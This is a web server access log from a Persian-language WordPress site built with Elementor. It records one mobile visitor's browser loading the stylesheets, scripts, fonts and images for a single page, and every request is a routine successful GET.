151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor/assets/css/widget-image-rtl.min.css?ver=3.28.4 HTTP/2" 200 119 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor-pro/assets/css/widget-nav-menu-rtl.min.css?ver=3.28.3 HTTP/2" 200 3178 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/e-animation-grow.min.css?ver=3.28.4 HTTP/2" 200 198 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor-pro/assets/css/modules/sticky.min.css?ver=3.28.3 HTTP/2" 200 162 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor/assets/css/widget-heading-rtl.min.css?ver=3.28.4 HTTP/2" 200 154 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor/assets/css/widget-spacer-rtl.min.css?ver=3.28.4 HTTP/2" 200 315 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor/assets/css/widget-icon-list-rtl.min.css?ver=3.28.4 HTTP/2" 200 952 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor/assets/css/widget-google_maps-rtl.min.css?ver=3.28.4 HTTP/2" 200 117 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor/assets/css/widget-social-icons-rtl.min.css?ver=3.28.4 HTTP/2" 200 1069 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor/assets/css/conditionals/apple-webkit.min.css?ver=3.28.4 HTTP/2" 200 472 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor-pro/assets/css/widget-form-rtl.min.css?ver=3.28.3 HTTP/2" 200 1409 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor-pro/assets/css/conditionals/popup.min.css?ver=3.28.3 HTTP/2" 200 328 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/css/view/general.min.css?ver=6.1.11 HTTP/2" 200 1365 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/essential-addons-elementor/eael-34777.css?ver=1731101171 HTTP/2" 200 1753 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/includes/icons/efaicons/style.css?ver=2.13.9 HTTP/2" 200 706 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/custom-jet-blocks-rtl.css?ver=1.3.18 HTTP/2" 200 5344 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.36.0 HTTP/2" 200 3845 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-34.css?ver=1745850393 HTTP/2" 200 811 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9 HTTP/2" 200 1874 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/jet-tabs/assets/css/jet-tabs-frontend.css?ver=2.2.8 HTTP/2" 200 3769 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.28.4 HTTP/2" 200 12380 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.28.4 HTTP/2" 200 3987 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor-extras/assets/lib/nicons/css/nicons.css?ver=2.2.52 HTTP/2" 200 1153 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/e-animation-bounce-in.min.css?ver=3.28.4 HTTP/2" 200 124 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/css/widget-divider-rtl.min.css?ver=3.28.4 HTTP/2" 200 707 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor-pro/assets/css/widget-share-buttons-rtl.min.css?ver=3.28.3 HTTP/2" 200 2110 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3 HTTP/2" 200 12164 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3 HTTP/2" 200 286 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3 HTTP/2" 200 284 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/e-animation-pop.min.css?ver=3.28.4 HTTP/2" 200 130 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor-pro/assets/css/modules/motion-fx.min.css?ver=3.28.3 HTTP/2" 200 210 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/jet-elements/assets/css/jet-elements-rtl.css?ver=2.7.5.1 HTTP/2" 200 2887 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/jet-elements/assets/css/addons/jet-countdown-timer-rtl.css?ver=2.7.5.1 HTTP/2" 200 228 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/jet-elements/assets/css/skin/jet-countdown-timer-rtl.css?ver=2.7.5.1 HTTP/2" 200 199 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/css/widget-icon-box-rtl.min.css?ver=3.28.4 HTTP/2" 200 658 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-34777.css?ver=1745911630 HTTP/2" 200 6205 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-55.css?ver=1745850395 HTTP/2" 200 1712 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-171.css?ver=1745850396 HTTP/2" 200 4940 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-26457.css?ver=1745850396 HTTP/2" 200 1000 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-26343.css?ver=1745850396 HTTP/2" 200 1000 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-26339.css?ver=1745850396 HTTP/2" 200 1000 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-26319.css?ver=1745850396 HTTP/2" 200 999 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-25858.css?ver=1745850396 HTTP/2" 200 955 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.css?ver=3.5.0 HTTP/2" 200 48223 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?ver=3.5.0 HTTP/2" 200 2859 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/css/rtl.css?ver=3.5.0 HTTP/2" 200 1082 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.15.3 HTTP/2" 200 283 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ekiticons.css?ver=3.5.0 HTTP/2" 200 11776 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/custom-icons/myic4/css/myic4.css?ver=1.0.0 HTTP/2" 200 948 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor-extras/assets/css/frontend-rtl.min.css?ver=2.2.52 HTTP/2" 200 23590 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/2" 200 29744 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/2" 200 4678 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.28.4 HTTP/2" 200 4042 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/2020/06/Artboard-1.png HTTP/2" 200 101202 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/2023/11/Gurobo_CPLEX.jpg HTTP/2" 200 180626 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/2021/01/Ali-Papi.jpg HTTP/2" 200 39828 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/2020/12/logo2.png HTTP/2" 200 4490 "https://optimyar.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-28744.css?ver=1745850429 HTTP/2" 200 1089 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/2022/03/Untitled-1-1.png HTTP/2" 200 65557 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/animations/styles/fadeIn.min.css?ver=3.28.4 HTTP/2" 200 77 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/essential-addons-elementor/eael-18728.css?ver=1731101171 HTTP/2" 200 1753 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Bold.woff2 HTTP/2" 200 40348 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-DemiBold.woff2 HTTP/2" 200 39896 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/Gandom/Gandom.woff2 HTTP/2" 200 49776 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/uploads/elementor/css/post-18728.css?ver=1745850429 HTTP/2" 200 971 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/Parastoo/Parastoo-Bold.woff2 HTTP/2" 200 48268 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-DemiBold.woff2 HTTP/2" 200 45640 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Black.woff2 HTTP/2" 200 41572 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Medium.woff2 HTTP/2" 200 45884 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff2 HTTP/2" 200 81612 "https://optimyar.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.28.4" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-solid-900.woff2 HTTP/2" 200 78196 "https://optimyar.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.28.4" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Bold.woff2 HTTP/2" 200 46124 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:38 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Regular.woff2 HTTP/2" 200 40852 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:38 +0330] "GET /wp-content/plugins/persian-elementor/includes/icons/efaicons/fonts/efaicons.woff2 HTTP/2" 200 24716 "https://optimyar.com/wp-content/plugins/persian-elementor/includes/icons/efaicons/style.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:38 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-regular-400.woff2 HTTP/2" 200 13276 "https://optimyar.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.28.4" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:38 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/Tanha/Tanha.woff2 HTTP/2" 200 41476 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:38 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Regular.woff2 HTTP/2" 200 35928 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:37 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Black.woff2 HTTP/2" 200 37296 "https://optimyar.com/wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:38 +0330] "GET /wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/fonts/elementskit.woff?y24e1e HTTP/2" 200 459560 "https://optimyar.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ekiticons.css?ver=3.5.0" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:38 +0330] "GET /wp-content/uploads/elementor/css/post-9192.css?ver=1745850429 HTTP/2" 200 1151 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:38 +0330] "GET /wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?ver=1.2.1 HTTP/2" 200 6867 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:38 +0330] "GET /wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.28.3 HTTP/2" 200 1442 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
